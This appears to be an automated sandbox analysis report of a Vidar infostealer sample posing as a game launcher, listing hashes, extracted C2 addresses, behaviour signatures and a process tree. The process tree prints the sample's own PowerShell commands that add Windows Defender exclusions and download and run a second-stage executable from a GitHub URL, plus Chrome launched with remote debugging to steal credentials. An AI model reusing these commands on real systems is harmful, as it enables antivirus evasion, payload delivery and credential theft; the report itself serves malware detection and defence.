Analysis
-
max time kernel
27s -
max time network
26s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
LauncherByLueV10.3.exe
Resource
win10v2004-20250314-en
General
-
Target
LauncherByLueV10.3.exe
-
Size
356KB
-
MD5
882f2b592e06416f4941bb547b6cfb78
-
SHA1
8a0924295b92688ceab0dcf3ba2fc32c73ae46e4
-
SHA256
73ebf92726261418991dfda72c656a6b9b8322a1fb79315ec5e614857431a77f
-
SHA512
3ed5bdc33be70e2fc8c40b528939e60d7cc1a7dc5759582a27e9c05e255e6078356eb3957829d4d298fd03f3f3263a09a6728f4c776aa218f75862a486e19872
-
SSDEEP
6144:kXXP6c1lu4PtsMUAfRf+BHA1V8x4ZvkbsUoUM/fbh+oJLX:kXD184PtrLRf+BgY4Zs7oZ/FzX
Malware Config
Extracted
vidar
13.3
23b8a0e48f77dc82cb41b2936121fd07
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x00030000000234c0-81.dat family_vidar_v7 -
Vidar family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 57 3484 powershell.exe 63 3484 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 264 powershell.exe 3484 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 63 3484 powershell.exe -
Uses browser remote debugging 2 TTPs 5 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2748 chrome.exe 4628 chrome.exe 5732 chrome.exe 1728 chrome.exe 3548 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation LauncherByLueV10.3.exe -
Executes dropped EXE 1 IoCs
pid Process 2604 zgwlhlflmenj.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 62 raw.githubusercontent.com 63 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zgwlhlflmenj.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 zgwlhlflmenj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString zgwlhlflmenj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879062771868817" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4656 chrome.exe 4656 chrome.exe 264 powershell.exe 264 powershell.exe 264 powershell.exe 3484 powershell.exe 3484 powershell.exe 3484 powershell.exe 2604 zgwlhlflmenj.exe 2604 zgwlhlflmenj.exe 2604 zgwlhlflmenj.exe 2604 zgwlhlflmenj.exe 4596 chrome.exe 4596 chrome.exe 2604 zgwlhlflmenj.exe 2604 zgwlhlflmenj.exe 2748 chrome.exe 2748 chrome.exe -
Suspicious behavior: LoadsDriver 10 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 660 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeDebugPrivilege 264 powershell.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4656 chrome.exe Token: SeCreatePagefilePrivilege 4656 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 4596 chrome.exe Token: SeCreatePagefilePrivilege 4596 chrome.exe Token: SeShutdownPrivilege 2748 chrome.exe Token: SeCreatePagefilePrivilege 2748 chrome.exe Token: SeShutdownPrivilege 2748 chrome.exe Token: SeCreatePagefilePrivilege 2748 chrome.exe Token: SeShutdownPrivilege 2748 chrome.exe Token: SeCreatePagefilePrivilege 2748 chrome.exe Token: SeShutdownPrivilege 2748 chrome.exe Token: SeCreatePagefilePrivilege 2748 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe 2748 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4656 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe 4596 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4656 wrote to memory of 4816 4656 chrome.exe 94 PID 4656 wrote to memory of 4816 4656 chrome.exe 94 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 1096 4656 chrome.exe 95 PID 4656 wrote to memory of 4716 4656 chrome.exe 96 PID 4656 wrote to memory of 4716 4656 chrome.exe 96 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99 PID 4656 wrote to memory of 4968 4656 chrome.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\LauncherByLueV10.3.exe"C:\Users\Admin\AppData\Local\Temp\LauncherByLueV10.3.exe"1⤵
- Checks computer location settings
PID:5948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\qanpxet', 'C:\Users', 'C:\ProgramData'"2⤵PID:1088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\qanpxet', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\qanpxet\zgwlhlflmenj.exe'"2⤵PID:3848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\qanpxet\zgwlhlflmenj.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
-
C:\Users\Admin\AppData\Local\qanpxet\zgwlhlflmenj.exe"C:\Users\Admin\AppData\Local\qanpxet\zgwlhlflmenj.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2604 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
PID:3548 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd861cdcf8,0x7ffd861cdd04,0x7ffd861cdd104⤵PID:2816
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2748 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xd4,0xfc,0x100,0xd8,0x104,0x7ffd861cdcf8,0x7ffd861cdd04,0x7ffd861cdd104⤵PID:1940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1760,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:34⤵PID:5052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2516,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2512 /prefetch:24⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2068,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2708 /prefetch:84⤵PID:4720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:14⤵
- Uses browser remote debugging
PID:5732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:14⤵
- Uses browser remote debugging
PID:4628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=1636,i,5695412802605583492,11298125072381715638,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4064 /prefetch:14⤵
- Uses browser remote debugging
PID:1728
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd861cdcf8,0x7ffd861cdd04,0x7ffd861cdd102⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1972 /prefetch:22⤵PID:1096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:32⤵PID:4716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2432 /prefetch:82⤵PID:4836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3056 /prefetch:12⤵PID:4928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3164 /prefetch:12⤵PID:4968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4236,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4260 /prefetch:22⤵PID:2684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4680 /prefetch:12⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4240,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4860 /prefetch:12⤵PID:5236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5464,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5480 /prefetch:82⤵PID:1836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5468 /prefetch:82⤵PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5500,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5476 /prefetch:82⤵PID:1116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3488 /prefetch:82⤵PID:1268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5060,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5104 /prefetch:82⤵PID:756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5100,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5652 /prefetch:82⤵PID:1320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5764,i,17131115189766248582,14333636099611352711,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5776 /prefetch:12⤵PID:3220
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4948
-
